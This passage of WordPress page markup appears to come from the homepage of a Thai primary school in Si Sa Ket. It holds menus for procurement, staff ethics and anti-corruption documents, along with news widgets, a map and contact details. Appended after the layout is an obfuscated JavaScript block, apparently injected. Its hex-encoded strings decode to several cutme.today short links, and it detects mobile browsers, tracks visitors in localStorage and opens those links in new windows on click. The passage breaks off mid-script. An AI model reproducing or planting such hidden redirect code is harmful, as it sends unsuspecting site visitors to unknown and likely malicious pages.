900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#130b0b\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":2,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"b3723dea\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-b3723dea gb-headline-text\"><strong>โรงเรียนบ้านหนองปลาเข็ง-กอไหล่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"51a75706\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-51a75706 gb-headline-text\">ตำบล โพธิ์ อำเภอ โนนคูณ ศรีสะเกษ 33250</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"fa4bd31f\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-fa4bd31f gb-headline-text\"><strong>ติดต่อเรา</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e820350\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"16px\"},\"spacing\":{\"marginBottom\":\"15px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e820350 gb-headline-text\">โทรศัพท์ :  093-325-2659 ผู้อำนวยการโรงเรียน</h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const 